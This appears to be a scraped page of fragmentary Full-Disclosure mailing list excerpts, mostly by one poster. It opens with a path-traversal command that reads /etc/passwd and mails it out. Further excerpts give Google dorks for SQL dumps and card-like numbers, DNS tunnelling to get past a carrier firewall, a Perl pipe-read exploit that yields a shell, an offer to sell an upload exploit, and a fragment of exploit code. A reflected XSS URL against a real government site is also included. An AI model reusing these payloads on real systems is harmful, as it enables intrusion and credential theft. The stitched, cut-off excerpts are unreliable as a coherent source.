links xxx.xx.xxx/../../../../../../etc/passwd -dump|mail -s
HOPE userz full-disclosure@lists.grok.org.uk
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by
So... Google really does let you search for any number...
http://www.google.com/#q=1..9+filetype:sql
:(
http://www.google.com/#q=10e7..10e8+filetype:sql
:)
___
Full-Disclosure - We believe in it.
Charter:
Google has totally 'blacklisted' queries. For example, if you search
for 4000..4999 (any 16 digit number starting
with 4), as well as some other little known strings, you will
instantly get an error message from Google talking about bad traffic
from your network (it looks
List,
I'll now be putting up my disclosures on YouTube a day or two before on
full-disclosure. You can visit them here:
http://www.youtube.com/user/onaquad under the title Onaquad Security. Hope
you enjoy! I'll probably start posting the src of the code I use there here
too. There is already
This works off the perl pipe read bug, you can just input the first and
second parts of the web address (with http:// included) and it'll drop you
at a shell. When using cd you must use the absolute path because I was too
lazy to do it the correct way. ;-). I know this is pretty easy stuff, it
This works off the perl pipe read bug, you can just input the first and
second parts of the web address (with http:// included) and it'll drop you
at a shell. When using cd you must use the absolute path because I was too
lazy to do it the correct way. ;-). I know this is pretty easy stuff, it
Well shit. It did send twice. :( Now I look like a goof, haha.
On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker
marshallwhitta...@gmail.com wrote:
This works off the perl pipe read bug, you can just input the first and
second parts of the web address (with http:// included) and it'll
I recently noticed that you can tunnel TCP through DNS (I used iodine) to
penetrate Verizon Wireless' firewall. You can connect, and if you can hold
the connection long enough to make a DNS tunnel, then the connection stays
up, then use SSH -D to create a proxy server for your traffic. Bottom
with, and abused so infrequently, that it's left alone.
On Fri, Oct 7, 2011 at 3:32 AM, Marshall Whittaker
marshallwhitta...@gmail.com wrote:
I recently noticed that you can tunnel TCP through DNS (I used iodine) to
penetrate Verizon Wireless' firewall. You can connect, and if you can hold
not
(well, it MIGHT take us somewhere good).
It's not like there's a magic off switch that makes this go away.
On Fri, Oct 7, 2011 at 4:56 AM, Marshall Whittaker
marshallwhitta...@gmail.com wrote:
Yes, I've found that DNS tunneling works well at the college I go to on
their WIFI. I've never
Hello,
I am willing to sell a new attack vector I have devised. The proof of
concept code you will receive has the ability to arbitrarily upload files to
a webserver (tested on Apache), running linux with the well known perl read
pipe vulnerability in many web CGI applications. This issue can
, Marshall Whittaker
marshallwhitta...@gmail.com wrote:
Hello,
I am willing to sell a new attack vector I have devised. The proof of
concept code you will receive has the ability to arbitrarily upload files
to
a webserver (tested on Apache), running linux with the well known perl
read
iOffice 0.1 is vulnerable because it does not sanitize user input. It seems
to be modular because none of the scripts are exactly the same on ones I've
run across, but they all seem to be vulnerable. Command execution is
possible.
I don't really consider this a vulnerability, but it's funny.
http://www.google.com/search?q=%79%61%68%6F%6Fie=ISO-8859-1source=hphl=enbtnI=I%26%2339;%69%6D%2B%46%65%65%6C%69%6E%67%2B%4C%75%63%6B%79
-- oxagast
___
Full-Disclosure - We believe in it.
);
unlink(getfile.sh);
$exploitable = 1;
}
}
}
system(rm gettmp getfile.sh);
}
if ($exploitable == 0) {
print Sorry, not exploitable...\n;
}
--- code ---
On Sun, Jun 20, 2010 at 11:43 PM, Marshall Whittaker
This works on the perl pipe bug. It'll take an arg that's the address of a
website and it's cgi script with some args to the script then figure out if
it can exploit it and how. It's worked on everything I've tried it on,
though I have limited test boxes. It's pretty dirty but it works.
FCC.gov XSS
--- CODE ---
http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E
--- CODE ---
--oxagast
17 matches
Mail list logo
